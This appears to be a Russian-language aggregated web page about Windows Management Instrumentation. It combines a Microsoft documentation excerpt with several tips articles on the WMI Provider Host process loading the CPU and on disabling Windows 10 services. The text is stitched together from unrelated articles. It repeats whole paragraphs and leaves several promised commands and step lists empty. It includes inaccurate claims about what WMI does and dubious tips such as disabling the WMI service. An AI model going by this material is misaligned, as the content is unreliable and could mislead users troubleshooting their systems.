Разное

Инструментарий управления windows: Инструментарий управления Windows (WMI) — Win32 apps

Содержание

Инструментарий управления Windows (WMI) — Win32 apps

Twitter LinkedIn Facebook Адрес электронной почты

  • Статья
  • Чтение занимает 2 мин

Назначение

Windows инструментарий управления (WMI) — это инфраструктура для управления данными и операциями с операционными системами на основе Windows. Вы можете создавать скрипты или приложения WMI для автоматизации административных задач на удаленных компьютерах, но WMI также предоставляет данные управления другим частям операционной системы и продуктов, например System Center Operations Manager (ранее Microsoft Operations Manager (MOM)) или Windows удаленному управлению (WinRM).

Примечание

Эта документация предназначена для разработчиков и ИТ-администраторов. Если вы являетесь конечным пользователем, который столкнулся с сообщением об ошибке wMI, перейдите к служба поддержки Майкрософт и найдите код ошибки, который отображается в сообщении об ошибке. Дополнительные сведения об устранении неполадок с скриптами WMI и службой WMI см. в статье WMI не работает!

Примечание

WMI полностью поддерживается корпорацией Майкрософт. Однако последняя версия административных сценариев и управления доступна через инфраструктуру управления Windows (MI). MI полностью совместим с предыдущими версиями WMI, и он предоставляет множество функций и преимуществ, которые упрощают проектирование и разработку поставщиков и клиентов. Дополнительные сведения см. в разделе Windows Management Infrastructure (MI).

Где применимо WMI?

WMI можно использовать во всех Windows приложениях, которые наиболее полезны в корпоративных приложениях и административных скриптах.

Системные администраторы могут найти сведения об использовании WMI в различных книгах по WMI. Дополнительные сведения см. в разделе «Дополнительные сведения».

Аудитория разработчиков

Инструментарий WMI предназначен для программистов, использующих C/C++, приложение Microsoft Visual Basic или язык сценариев, на Windows и обрабатывающий объекты Microsoft ActiveX. Хотя некоторые знания о программировании COM полезны, разработчики C++, которые пишут приложения, могут найти хорошие примеры для начала работы с созданием приложения WMI с помощью C++.

Сведения о разработке поставщиков управляемых кода или приложений в C# или Visual Basic .NET с помощью платформа .NET Framework см. в разделе WMI в платформа .NET Framework.

Многие администраторы и ИТ-специалисты получают доступ к WMI через PowerShell. Командлет Get-WMI для PowerShell позволяет получить сведения для локального или удаленного репозитория WMI. Таким образом, ряд разделов и классов, особенно в разделе «Создание клиентов WMI «, содержат примеры PowerShell. Дополнительные сведения об использовании PowerShell см. в Windows PowerShell.

Требования к среде выполнения

Дополнительные сведения о том, какая операционная система требуется для использования определенного элемента API или класса WMI, см. в разделе «Требования» каждого раздела в документации по WMI.

Если ожидаемый компонент, как представляется, отсутствует, см. сведения о доступности компонентов WMI операционной системы.

Для создания скриптов или приложений для WMI не требуется скачивать или устанавливать определенную разработку программного обеспечения (SDK). Однако существуют некоторые средства администрирования WMI, которые разработчики находят полезными. Дополнительные сведения см. в разделе «Загрузки» в разделе «Дополнительные сведения».

В этом разделе

Раздел Описание
Сведения о WMI Общие сведения о WMI.
Использование WMI Сведения о разработке приложений для использования инструментария WMI, который содержит сведения о средствах.
Справочник по WMI Документация по классам WMI, классам WMI C++, COM API WMI, API скриптов и другим справочным материалам по WMI.
Глоссарий WMI Windows инструментарий управления (WMI) использует собственную коллекцию терминов. Многие из этих терминов знакомы разработчикам, но имеют новые или измененные определения в среде WMI.

WMI Provider Host Windows 10 грузит процессор

Процесс WMI Provider Host — один из важных компонентов Windows, который обычно не отнимает много системных ресурсов. Тем не менее бывают и исключения из этого правила.

Что делать, если WMI начинает отбирать память у компьютера и, таким образом, замедлять его работу? Рассмотрим сегодня, что это за процесс, и как решить проблемы с ним разными методами.

Содержание

  • Что такое WMI Provider Host

    • Почему данный процесс может грузить ПК

  • Что делать, если процесс WMI Provider Host грузит процессор на Windows 10

    • Проверка на вирусы: как отличить вирус Wmiprvse.exe от подлинного процесса

    • Отключение WMI Provider Host в службах

    • Перезапуск службы

    • Поиск приложения, из-за которого повысилась нагрузка

    • Откат обновления Windows

      • Видео: как удалить определённые обновления на Windows 10

    • Чистая загрузка Windows

Что такое WMI Provider Host

Аббревиатура WMI расшифровывается как Windows Management Instrumentation. В переводе с английского — инструмент управления операционной системы. Этот процесс создали, чтобы приложения и сервисы могли запрашивать необходимую для них информацию у системы и тут же вовремя её получать.

В «Диспетчере задач» отображаются проценты ресурсов, которые процесс WMI отбирает у системы

С помощью процесса WMI пользователь может получить информацию, которая не отображена в интерфейсе компьютера, например, серийный номер ПК, состояние жёсткого диска или модель материнской платны. WMI также отвечает за подключение внешнего оборудования к ПК (наушников, колонок, принтеров и т. д.) и управление им.

Почему данный процесс может грузить ПК

Процесс WMI не потребляет постоянно много ресурсов ПК. Его некоторая активность может наблюдаться, когда какая-то утилита делает запрос информации через WMI. Таким образом, временное увеличение нагрузки на ЦП, «оперативку» и жёсткий диск — норма. Через некоторое время нагрузка уходит. Если же наблюдается потребление большого количества ресурсов этим процессом в течение долгого времени, значит, что-то не так с процессом.

По каким причинам процесс может грузить систему?

  1. Вирус. Если наблюдается непривычное увеличение нагрузки, возможно, это не настоящий процесс WMI, а замаскированный вирус. Здесь необходимо убедиться в том, что он неподлинный и вылечить систему.
  2. Неправильное обновление. Апдейт Windows может установиться некорректно по каким-то причинам. Это, в свою очередь, может вызвать аномальное поведение WMI.
  3. Некорректно установленное приложение. Оно может, таким образом, запрашивать данные неправильно, что и будет заставлять процесс потреблять больше ресурсов, чем требуется.

Что делать, если процесс WMI Provider Host грузит процессор на Windows 10

При аномальной нагрузке от процесса WMI Provider Host необходимо принимать меры. Есть несколько способов исправить ситуацию. Они подойдут даже новичкам, так как в инструкции все действия будут рассмотрены подробно и пошагово.

Проверка на вирусы: как отличить вирус Wmiprvse.exe от подлинного процесса

Чрезмерная нагрузка на ресурсы ПК от Wmiprvse. exe может быть вызвана вирусом, который замаскировался под данный процесс. Как выяснить, настоящий ли это процесс?

  1. Сначала необходимо вызвать на экране «Диспетчер задач». В Windows 10 это сделать намного проще, чем в предыдущих версиях: нажимаем правой клавишей мышки на «Панель задач» и в меню на тёмном фоне выбираем пункт «Диспетчер задач».Откройте «Диспетчер задач» через контекстное меню «Панели задач»
  2. Теперь ищем в перечне в первой вкладке процесс Wmiprvse.exe.
  3. Щёлкаем по нему правой клавишей и в меню выбираем «Открыть расположение файла».
  4. Именно нетипичное расположение файла указывает на то, что процесс, вероятнее всего, вирус, а не подлинная стандартная служба Windows. На экране должно появиться окно «Проводника Windows» с выделенным файлом в списке. В частности, должна запуститься папка System32 или wbem, расположенная на системном диске.
  5. Если открылся совершенно другой раздел, проверяем ПК антивирусом. Лучше всего в этой ситуации запустить полное сканирование всех жёстких дисков. Сделайте перед этим апдейт антивируса при необходимости. В случае обнаружения вредоносного ПО, программа его удалит или поместит в карантин (изолирует от всех других файлов), а затем сама вылечит систему.Проверьте свой ПК на наличие вирусов с помощью функции полного сканирования в антивирусе

Отключение WMI Provider Host в службах

Вы можете деактивировать процесс WMI Provider Host («Инструментарий управления Windows») в окне «Службы» или «Диспетчер задач», однако делать это крайне не рекомендуется, так как это может вызвать сбои в системе: могут отключиться важные компоненты Windows. При этом ситуацию вы не исправите: процесс после отключения вновь запустится и будет потреблять ресурсы и дальше. Для решения проблемы необходимо найти сторонний процесс, который постоянной обращается к WMI и, таким образом, нагружает его.

Перезапуск службы

Перед тем как искать процесс, который заставляет Wmiprvse.exe нагружать процессор, попробуйте сделать перезапуск последнего в окне «Службы». Возможно, это единичный сбой. После перезагрузки служба в таком случае начнёт работать в нормальном режиме. Перезапустите ПК либо сделайте следующее в окне «Службы»:

  1. На клавиатуре зажмите две клавиши: Win и R. В появившемся поле «Открыть» вставьте код services.msc, чтобы запустить окно «Службы».Введите команду services.msc в поле «Открыть»
  2. В большом перечне отыщите службу под названием «Инструментарий управления Windows». Кликаем по ней правой клавишей, а потом выбираем опцию «Перезапустить».Выберите опцию «Перезапустить» в контекстном меню
  3. Если у вас открыта вкладка «Расширенный», слева у вас будет меню, в котором будет также ссылка «Перезапустить».Кликните по ссылке «Перезапустить» в средней части окна «Службы»

Поиск приложения, из-за которого повысилась нагрузка

Wmiprvse.exe может потреблять много ресурсов устройства, если к нему постоянно обращается какой-то другой процесс утилиты, установленной на ПК, или подключённого оборудования.

Она может неверно работать или просто запрашивать большой объём данных для своих потребностей от WMI-поставщиков. Как в этом случае быть:

  1. Снова вызываем окно «Выполнить»: зажимаем одновременно две кнопки на клавиатуре: Win и R. Вводим код Eventvwr.msc, чтобы открыть окно «Просмотр событий».Вставьте в поле «Открыть» код Eventvwr.msc
  2. В появившемся окне вам нужно поочерёдно открывать следующие блоки: «Журналы приложений и служб» – Microsoft — Windows — WMIActivity — Operational.
  3. В средней части окна журнала отыщите в перечне пункт «Ошибка». Если там такой не один пункт, откройте несколько первых (то есть самых свежих): кликните левой клавишей мышки по нему и в первой вкладке «Общие» найдите пункт ClientProcessId. Это и есть номер процесса, из-за которого возникла ошибка WMI. Вам необходимо просто запомнить это номер. В данном случае это число 948.Кликните левой кнопкой по одной из первых ошибок и найдите идентификатор ClientProcessId
  4. Теперь запустите «Диспетчер задач» через контекстное меню «Панели задач». Переключаемся в окне сразу на вкладку «Подробности». Кликните по заголовку столбца «ИД процесса», чтобы легче было найти процесс по номеру. Находим процесс. В нашем случае ошибку вызывал NvBackend.exe.Найдите в списке приложение с номером ClientProcessId

После определения виновника необходимо решать проблему уже с ним. Вы можете просто перезагрузить найденный процесс или же остановить его работу в «Диспетчере задач» (воспользуйтесь кнопкой «Снять задачу»). Если это не помогает, обновите приложение, которое нагружает процесс Wmiprvse.exe либо переустановите его.

Если вы им вовсе не пользуетесь, удалите его с ПК. Для этого рекомендуется взять сторонний деинсталлятор, например, CCleaner или RevoUninstaller. Эти программы помогут качественно удалить приложение: не останется никаких остаточных записей в виде записей в реестре после очистки.

Чтобы определить, не нагружает ли процесс ЦП из-за какого-то подключённого к ПК устройства, по очереди отсоединяйте то или иное оборудование (мышка, принтер, клавиатура, сканер, колонки и т. д.) и наблюдайте за системой через «Диспетчер задач».

Откат обновления Windows

Если апдейт был неправильно установлен, это может вызвать аномальную загрузку ЦП процессом Wmiprvse.exe. Если ресурсов стало потребляться много сразу после обновления, скорее всего, в этом и причина. В этом случае необходимо сделать ручной откат: удалить установленные обновления, чтобы системы снова смогла их загрузить и установить, но уже корректно. Приступим к процедуре:

  1. На клавиатуре зажимаем две кнопки: Win и I, чтобы на экране появилось окно «Параметры Windows». Если сочетание не срабатывает на вашем ПК, открывайте меню «Пуск» и кликайте по шестерёнке над кнопкой для выключения устройства.Кликните по иконке в виде шестерёнки, чтобы открыть окно «Параметры Windows»
  2. Среди всех плиток нас интересует только одна — «Обновления и безопасность». Щёлкаем по ней. Она находится в последнем ряду.Кликните один раз по разделу «Обновления и безопаность»
  3. После этого мы попадём сразу в нужную вкладку «Центр обновления Windows». Здесь кликаем по ссылке «Просмотреть журнал установленных обновлений».Кликните по ссылке «Просмотреть журнал установленных обновлений»
  4. На следующей странице жмём на «Удалить обновления».Кликните по первой ссылке «Удалить обновления» для запуска нового окна
  5. На экране появится другое окно с перечнем недавних обновлений. Кликаем по самому последнему правой клавишей и нажимаем на единственный пункт в контекстном меню «Удалить».В контекстном меню первого апдейта в списке кликните по «Удалить»
  6. Подтверждаем своё намерение удалить последнее обновление. Ждём, когда процедура завершится и проверяем, не снизилась ли нагрузка на ЦП. Если нет, попробуйте удалить ещё одно обновление в этом же списке. Не переживайте — после удаления система сама снова установит их, но на этот раз без ошибок. В результате процесс Wmiprvse.exe не будет нагружаться.Нажмите на «Да», чтобы подтвердить удаление
Видео: как удалить определённые обновления на Windows 10

Если вы им вовсе не пользуетесь, удалите его с ПК. Для этого рекомендуется взять сторонний деинсталлятор, например, CCleaner или RevoUninstaller. Эти программы помогут качественно удалить приложение: не останется никаких остаточных записей в виде записей в реестре после очистки.

Чтобы определить, не нагружает ли процесс ЦП из-за какого-то подключённого к ПК устройства, по очереди отсоединяйте то или иное оборудование (мышка, принтер, клавиатура, сканер, колонки и т. д.) и наблюдайте за системой через «Диспетчер задач».

Откат обновления Windows

Если апдейт был неправильно установлен, это может вызвать аномальную загрузку ЦП процессом Wmiprvse.exe. Если ресурсов стало потребляться много сразу после обновления, скорее всего, в этом и причина. В этом случае необходимо сделать ручной откат: удалить установленные обновления, чтобы системы снова смогла их загрузить и установить, но уже корректно. Приступим к процедуре:

Чистая загрузка Windows

Ещё один выход из сложившейся ситуации — «чистый» запуск Windows без загрузки всех ненужных процессов программ, которые и могут заставлять WMI потреблять много системных ресурсов.

WMI Provider Host может сильно нагружать систему, если является замаскированным вирусом или если какая-либо утилита, которая запрашивает постоянно информацию у системы через этот процесс, некорректно работает. Если нагрузка на систему большая, сначала необходимо убедиться, что это не вредоносное ПО, а затем выяснить, какое приложение обращается к этому процессу. После этого обновите либо переустановите утилиту. В качестве дополнительных решений выступают откат обновлений и «чистая» загрузка Windows.

Инструментарий управления Windows как отключить?

Любой бывалый Windows-админ не раз сталкивался с проблемами в работе службы WMI и ее компонентах. Наличие проблем в подсистеме WMI является критичным с точки зрения нормального функционирования системы, поэтому администратору приходится прибегать к тем или иным трюкам, позволяющим восстановить работоспособность WMI. В этой статье мы опишем достаточно простую методику диагностирования и устранения неполадок в службе WMI.

О наличии проблем с WMI может свидетельствовать широкий спектр ошибок:

В первую очередь нужно проверить имеется ли в системе служба Windows Management Instrumentation (Winmgmt) и включена ли она.

Если служба присутствует и находится в состоянии Started, рекомендуется протестировать работоспособность WMI, обратившись к ней с помощью простого wmi-запроса. С помощью Powershell, например, это можно сделать так:

Если при выполнении простейшего WMI-запроса система возвращает ошибку (на скриншоте приведен пример корректного ответа службы WMI), вероятно имеет место некорректное функционирование сервиса WMI или ряда его подсистем, повреждение репозитория WMI или другие проблемы.

Утилита WMIDiag

Для «тонкой» диагностики службы WMI существует официальная утилита Microsoft — WMIDiag (Microsoft WMI Diagnosis). Утилита представляет собой vbs скрипт, который проверяет различные подсистемы WMI и записывает собранную информацию в лог файлы (по умолчанию логи находятся в каталоге %TEMP% — C:\USERS\%USERNAME%\APPDATA\LOCAL\TEMP\). Получившийся отчет состоит из файлов, имена которых начинаются с WMIDIAG-V2.1 и включает в себя следующие типы фалов :

После окончания работы утилиты WMIDiag администратор должен изучить полученные файлы логов, проанализировать и попытаться исправить найденные ошибки.

Монитор ресурсов предоставляет гораздо более подробную статистику ресурсов, чем диспетчер задач из которого его можно запустить, перейдя на вкладку «Производительность». Также утилиту легко найти по названию в поиске Windows.

Системный монитор

Приложение «Системный монитор» группирует информацию о производительности из множества источников. Регистрирует и сохраняет данные о влиянии всевозможных системных изменений и событий на уровень производительности ПК за определенный отрезок времени. Это позволяет пользователю выявить и устранить источник проблемы, негативно повлиявшей на скорость работы компьютера. Для запуска инструмента достаточно найти его по названию в поиске Windows или с помощью утилиты «Выполнить», введя команду «perfmon».

Инструменты администрирования и управления ПК

В папке «Администрирование» панели управления содержится утилита «Управление компьютером», позволяющая взаимодействовать с инструментами Консоли управления Microsoft (mmc), включая монитор производительности, с помощью единого интерфейса.

Помимо прочих, «Управление компьютером» включает в себя:

Внутри папки «Администрирование» вы сможете найти также и другие, не менее полезные утилиты и инструменты.

Инструмент расширенного управления пользовательскими аккаунтами

В состав Windows включен скрытый инструмент управления аккаунтами пользователей компьютера, предоставляющий доступ к дополнительным параметрам и настройкам учетных записей. Для его запуска воспользуйтесь утилитой «Выполнить», введя и выполнив команду «netplwiz».

Окно приложения содержит кнопку перехода в оснастку «Локальные пользователи и группы», однако она доступна только в расширенных редакциях операционной системы Microsoft.

Очистка диска

Инструмент очистки диска не зарыт в недрах системы, но лишь немногие юзеры умеют максимально использовать его функционал. Он сканирует ваш компьютер на наличие файлов, удаление которых не навредит работоспособности Windows. Сюда входят сохраненные веб-страницы браузеров, копии эскизов изображений, файлы, временно создаваемые программами в процессе работы, содержимое корзины и прочее.

Кнопка «Очистить системные файлы» в окне очистки диска позволяет удалить копии пакетов драйверов установленных устройств, дампы памяти, устаревшие резервные копии ОС и ненужные файлы обновлений. Это в частности позволяет освободить ценное дисковое пространство системного носителя.

Редактор локальной групповой политики

Редактор локальной групповой политики присутствует во всех редакциях Windows, кроме «Домашней». С его помощью специалисты администрируют уровни доступа пользователей и компьютеров в сети. Но в редакторе присутствуют настройки, которые могут пригодиться и обычным юзерам. К примеру, в Windows 10 с помощью редактора локальной групповой политики можно отредактировать экран входа в систему и отображаемую на нем пользовательскую информацию.

Для запуска редактора воспользуйтесь командой «gpedit.msc», введенной в поле «открыть» системной утилиты «Выполнить».

Редактор реестра

Несмотря на широкую известность редактора реестра, получить доступ к утилите все еще непросто – у нее до сих пор нет собственного ярлыка запуска в стартовом меню Windows. Поэтому единственным способом вызвать редактор реестра является ввод команды «regedit» в окне утилиты, вызываемой сочетанием клавиш «Windows + R».

Большинство изменений, которые пользователь может внести в систему с помощью редактора локальных групповых политик можно сделать с помощью редактора реестра. Это пригодится в случае использования «Домашней» редакции операционной системы от Microsoft, где доступ к групповым политикам невозможен. К примеру, в обеих утилитах можно отключить отдельным пользователям возможность завершать работу Windows. Ко всему прочему реестр содержит ряд параметров, отсутствующих в редакторе групповых политик.

Поскольку редактор реестра является комплексной и сложной утилитой, вносить изменения следует крайне осторожно и только в том случае, если вы уверены в своих действиях. Иначе можно повредить компоненты операционной системы или сделать Windows полностью неработоспособной. Перед тем, как внести изменения в реестр, на случай непредвиденных ситуаций, необходимо сделать его резервную копию. Также используйте проверенные источники информации касательно всевозможных твиков реестра.

Конфигурация системы

Еще одна малоизвестная утилита называется «Конфигурация системы». В ранних версиях Windows лишь с ее помощью пользователь мог отключить или включить автоматическую загрузку определенных приложений одновременно с операционной системой. Сейчас этот функционал перебрался в диспетчер задач. Однако утилита до сих пор позволяет управлять параметрами загрузки Windows и определять очередность запуска операционных систем при наличии нескольких, установленных на одном ПК.

Запускается утилита из окна «Выполнить» с помощью команды «msconfig».

Сведения о системе

Инструмент «Сведения о системе» позволяет получить исчерпывающую информацию о компьютере, его компонентах, аппаратных ресурсах и программной среде. Здесь можно узнать модель и производителя системной платы, графического ускорителя, процессора, объем и тип памяти и другие полезные сведения.

Как wmi provider host влияет на сбои компьютера?

Если вы заметили, что ваш ПК начал давать сбои и глючить, тогда первым делом желательно заглянуть в диспетчер задач, чтобы понять, какая служба забирает больше всех прочих служб энергии и ресурсов вашего компьютера.

Из снимка хорошо видно окошко диспетчера, с перечнем работающих программ. На данный момент эта утилита нагрузила ЦП всего на 14%. Что сравнительно мало, если учитывать, что она процессору может дать нагрузку до 90%. В это время Windows уже не понимает, что он толком делает и на ваши команды может не реагировать. Эти глюки могут продолжаться от 3 минут и до того момента, когда вы перезагрузите компьютер.

Wmi provider host Windows 10 – следит за корректным функционированием любого внешнего прибора, который подключён к компьютеру. Например, этом может быть принтер, флешь карта, картридер, факс, видеокамера и прочее.

В диспетчере данная службы иногда называется WMIPrvSE.exe. Именно этот элемент запускает службу.

Данный элемент очень важен для корректной работы Windows. Если его отключить, ПК просто не заметит устройства, которые к нему присоединены. Но, хакеры наловчились использовать данный момент, чтобы внедрять свои вирусные коды со схожими названиями элементов. На это обычно не обращают внимание новички. Даже больше, на подобные файлы иногда не обращают внимание антивирусы с приличной репутацией.

Но, не только вредоносный софт может быть причиной увеличенной нагрузкой на систему. Иногда причина кроется в следующем:

Пользователи уже завалили форумы Microsoft обращениями с просьбами исправить положение. Но, создатели не особо стремятся предоставить решение этой задачи. Отсюда, люди придумывают самостоятельно методы, как устранить причину повышения нагрузки на ЦП и как увеличить его работоспособность ПК.

Что в этом случае можно сделать?

Самое главное, человеку нужно найти настоящий источник поломки. Вначале рекомендуется просканировать систему антивирусом, чтобы убрать вариант вирусной атаки. Можно применить два следующих антивируса. Вначале Malwarebytes, затем DrWeb Curelt.

Правда, программа Malwarebytes стала платной. Но, у неё есть бесплатная Демо версия, которой достаточно, чтобы исправить положение. DrWeb Curelt утилита бесплатная. Скачайте данные программы и запускайте (по одной). Затем, начинаете тщательное сканирование. После этого, вам нужно перезагрузить ПК и узнать, сохранилась ли сложность с работой этого процесса, или она исчезла?

Кроме этого, желательно активировать диспетчер задач нажав Alt+Ctrl+Del и в перечне элементов поискать самый ресурсоёмкий. Затем, нажимаем на него правой клавишей мыши. В ниспадающем меню нужно нажать «Открыть расположение файла».

В случае, если открывшейся элемент будет расположен не в папочке Windows /System32 (System), то это значит, что данном файле есть встроенный вирус. Тогда начинаем тщательное сканирование нашими двумя антивирусами.

Как выключить wmi provider host?

Итак, вполне возможно, что элемент WMIPrvSE.exe дальше создаёт ошибки и мы выяснили, что он не вирус. В этом случае будем использовать другие методы. Нужно понять, какие устройства или софт создаёт негативный фактор на компьютере? Итак, начинаем:

Если же проделанные выше операции нам не помогли, нужно отключить саму службу wmi provider host:

Отмечу, что данный метод не является наиболее правильным. Но, иного пока мы не нашли. Создатели говорят, что в ближайшее время ситуация будет исправлена. На данный же момент, придётся подвергнуть ОС данному риску, чтобы мы смогли работать без компьютерных сбоев.

как исправить данный процесс

Вывод: — данный процесс помогает налаживать связь между подсоединёнными к компьютеру приборами, и он же создаёт такие ошибки. Советую при подобных ошибках начинать их исправление по инструкции в статье, и у вас система должна заработать без сбоев. Успехов!

С уважением, Андрей Зимин 29.09.2019

Любой бывалый Windows-админ не раз сталкивался с проблемами в работе службы WMI и ее компонентах. Наличие проблем в подсистеме WMI является критичным с точки зрения нормального функционирования системы, поэтому администратору приходится прибегать к тем или иным трюкам, позволяющим восстановить работоспособность WMI. В этой статье мы опишем достаточно простую методику диагностирования и устранения неполадок в службе WMI.

О наличии проблем с WMI может свидетельствовать широкий спектр ошибок:

В первую очередь нужно проверить имеется ли в системе служба Windows Management Instrumentation (Winmgmt) и включена ли она.

Если служба присутствует и находится в состоянии Started, рекомендуется протестировать работоспособность WMI, обратившись к ней с помощью простого wmi-запроса. С помощью Powershell, например, это можно сделать так:

Если при выполнении простейшего WMI-запроса система возвращает ошибку (на скриншоте приведен пример корректного ответа службы WMI), вероятно имеет место некорректное функционирование сервиса WMI или ряда его подсистем, повреждение репозитория WMI или другие проблемы.

Как отключить инструментарий управления windows 10. Как ускорить Windows — отключаем ненужные службы

Какие службы отключить в Windows 10

Сие действие можно выполнить следующими способами.

а) Открыв меню «Пуск», переходим в «Управление компьютером».

В правом углу открывшегося окна выбираем пункт «Службы».

б) Открыв «Проводник Windows», правым кликом мышки по «Компьютер», задействуем вкладку «Управление».

в) С помощью консоли. Для этого сочетанием горячих клавиш +R, вводом команды «services. msc» (без кавычек) и нажатием по кнопке «OK» открываем оную.

Какой из вариантов будете использовать решать вам.

Ну, а мы продолжаем.

Список ненужных служб Windows 10

Не зависимо от того, какой из вышеуказанных вариантов выбрали вы, во всех случаях перед вами откроется одно окно с их списком. Двойным кликом правой кнопкой мыши по нужному из них появится новое окошко с параметрами запуска. Где в зависимости от того, что необходимо предпринять — «Активировать» или «Выключить», необходимо выбрать соответствующий пункт.

Стоит помнить, что некоторые сервисы взаимосвязаны. Имейте это ввиду. Узнать, с какими именно, можно открыв вкладку «Зависимости».

В этом случае, отключив одну службу, можно прекратить работу другой, вплоть до загрузки системы. Выше на скриншоте, также показано, от каких компонентов зависит. А внизу приведены те, которые, напротив, не смогут загрузиться, если сервис будет отключен.

Знайте это, на случай если вы решитесь на эксперименты.

Что же касается безопасного решения. Ниже предоставлю название тех, деактивация которых не повлечет за собой никаких проблем в дальнейшей работе компьютера, при условии, что они вами не используются!

Но и это еще не все!

Данная утилита позволяет сканировать операционную систему и выводит на экран список всех активных и не задействованных служб. Где можно произвести все необходимые действия.

В приложении присутствует русский язык. Не требует установки.

Продукт имеет 4 автоматических режима настройки.

«По умолчанию», «Безопасно», «Оптимально» и «Экстремально».

После выбора следующим этапом требуется кликнуть на кнопку «Применить» настроек и перезапуститься.

И что не мало важно — в утилите присутствует откат настроек, на случай если что-то пойдет не так.

Tool W10Privacy

На этом все. Знаете еще варианты, или что можно удалить, — пишите в комментарии под постом. Думаю, не только мне, но и всем читателям блога будет интересно и познавательно узнать ваше мнение и советы. Спасибо!

Слово «оптимизация» стало теперь очень модным: оптимизируют личные расходы, бюджетные траты, технологические процессы и много чего ещё. На этой волне появилось и такое понятие как «оптимизация Windows». Однако что же это означает применительно к операционной системе? Прежде всего, это удаление и отключение всего ненужного и неиспользуемого, а также настройка Windows 10, ориентированная на максимальную производительность или удобство — в зависимости от потребностей пользователя.

В интернете есть множество сайтов, на которых активно рекомендуются всевозможные программы для оптимизации Windows 10, ускоряющие систему буквально одним кликом. Мы принципиально не рассматриваем ни одного такого стороннего расширения. Опыт показывает, что использование такого ПО в подавляющем большинстве случаев создаёт проблем больше, чем решает.

Если в начале работы таких оптимизаторов эффект даже может быть заметен, то со временем компьютер начинает работать всё хуже, а программы-чистильщики уже не только не помогают, но ещё больше усугубляют ситуацию. Попутно с оптимизацией они могут внести множество малопонятных изменений в настройки операционной системы. Нередки случаи и откровенного вреда от таких оптимизаторов для работоспособности компьютера.

Именно поэтому в своей статье мы рассматриваем исключительно встроенные в Windows 10 возможности оптимизации.

В этой статье мы пошагово оптимизируем «десятку». Для начала обозначим основные этапы предстоящего процесса:

Помимо основных этапов в процессе оптимизации Windows 10 можно выделить и некоторые дополнительные шаги.

Самым радикальным решением, которое почти гарантированно улучшит работу операционной системы является её переустановка начисто. Но этот процесс мы рассматриваем в отдельной статье.

Настройка электропитания

По умолчанию электропитание в Windows 10 настроено на оптимальное соотношение расхода энергии и производительностью. Если вы не используете ноутбук на батарее, а работаете напрямую от сети, то лучше всего выставить этот параметр на высокую производительность. Для этого надо:

Удаление ненужных расширений

Далее займёмся удаление ненужных приложений и программ. Как это делается, подробно описано в соответствующей статье на нашем сайте, поэтому здесь мы не будем подробно останавливаться на этом пункте. Добавим лишь, что на этом же этапе также нужно провести генеральную уборку на компьютере — удалить ненужные пользовательские файлы: фильмы, музыку, картинки и документы.

Чистка автозапуска

На следующем этапе выключим автозапуск ненужных программ. Для этого надо:

Для наибольшего быстродействия из автозагрузки можно убрать абсолютно все программы, но делать это всё-таки желательно осознанно, почитав предварительно в поиске, зачем нужно то или иное расширение.

Удаление ненужных системных файлов

Собственные ненужные нам файлы мы уже удалили. Теперь остаётся избавиться от ненужного системного мусора. Например, сюда относятся файлы уже установленных обновлений, папка с предыдущей версией Windows и прочее.

В зависимости от объёма накопившегося мусора, этот процесс может занять до нескольких десятков минут.

Дефрагментация жёсткого диска

Теперь, когда всё ненужные файлы и программы из системы удалены, можно упорядочить оставшиеся для более быстрого доступа. Именно с этой целью проводится дефрагментация. Обратите внимание, что проводить её стоит только на HDD (стандартных жёстких дисках, которые немного шумят во время работы). На SSD (бесшумных твердотельных накопителях) это делать крайне не рекомендуется — такие современные носители информации рассчитаны на меньшее количество циклов перезаписи.

После этого нужно набраться терпения — в зависимости от объёма работы оптимизация может продолжаться от нескольких десятков минут до пары часов.

Замена антивирусной программы на более лёгкую

Подробнее об этом мы рассказываем в отдельной статье «Самый быстрый бесплатный антивирус для слабого компьютера ».

Дополнительные способы оптимизации Windows 10

Если проделанные действия не способствуют желаемому ускорению компьютера, то можно попробовать некоторые дополнительные методы оптимизации компьютера с операционной системой Windows 10.

Отключение визуальных эффектов

Плавно открывающиеся окна, эффекты полупрозрачности и тому подобные штуки, разумеется, выглядят довольно симпатично, но для слабого компьютера они могут создавать ошутимую дополнительную нагрузку. Все эти визуальные украшательства можно отключить для хотя бы небольшого улучшения быстродействия системы. Для этого:

Увеличение размера файла подкачки

Найти файл подкачки в Windows 10 можно так:

Изменение конфигурации системы

Нажимаем Win+R и вводим msconfig, нажимаем Enter. Открывается окно «Конфигурация системы». Здесь мы можем немного ускорить процесс запуска операционной системы. Для этого во вкладке «Загрузка» нажимаем на кнопку «Дополнительные параметры» и в новом окне ставим галочки на числе процессоров и максимуме памяти и выбираем там самые возможно высокие значения и жмём ОК. Также тут можно поставить галочку «Без GUI». Этот пункт позволит немного ускорить старт за счёт отключения его визуального отображения — иначе говоря, до рабочего стола Windows 10 будет запускаться на фоне чёрного экрана, без надписей, изображений и анимации.

WMI Provider Host — что это за процесс грузит процессор

Несмотря на то, что система Виндовс считается относительно стабильной и самой популярной в мире, она не лишена недостатков. Сегодня рассмотрим один из таких моментов — WMI Provider Host, что это за процесс грузит процессор и как бороться с таким негативным поведением встроенного компонента Windows.

Почему ПК начинает тормозить из-за WMI Provider Host

Я всегда рекомендую пользователям ПК при существенном замедлении работы Виндовс открывать диспетчер задач для выявления служб, которые потребляют большое количество ресуров. На скриншоте выше можно видеть окно, содержащее список запущенных задач. Рассматриваемый нами элемент иногда может нагружать процессор вплоть до 90%. В такие моменты ОС перестает адекватно реагировать на наши команды, «тормоза» могут продолжаться от нескольких минут до последующей перезагрузки ноутбука.

WMI Provider Host Windows 7 (или в любой другой версии «операционки» Майкрософт) – отвечает за корректную работу всех внешних устройств, подключенных к ПК. К ним можно отнести принтеры, факсы, съемные носители информации – флешки, кардридеры, HDD/SSD.

Иногда в перечне процессов может иметь иное название — WMIPrvSE.exe (это файл запускающий службу).

Объект имеет высочайший уровень важности для функционирования ОС. Без него компьютер попросту не будет видеть присоединяемые к нему приспособления.

Но злоумышленники научились пользоваться этим моментом для внедрения вирусных скриптов с похожими названиями файлов, на что нередко «клюют» неопытные юзеры. И даже антивирусное программное обеспечение не всегда видит угрозу.

Помимо вирусов, причины повышения нагрузки на ресурсы могут быть следующими:

Несмотря на то, что официальный форум Майкрософт завален подобными обращениями, разработчики не торопятся предоставлять решение. Поэтому, пользователи подбирают собственные способы устранения проблемы с повышенной нагрузкой и замедлением работы компа.

Что делать? Кто виноват?

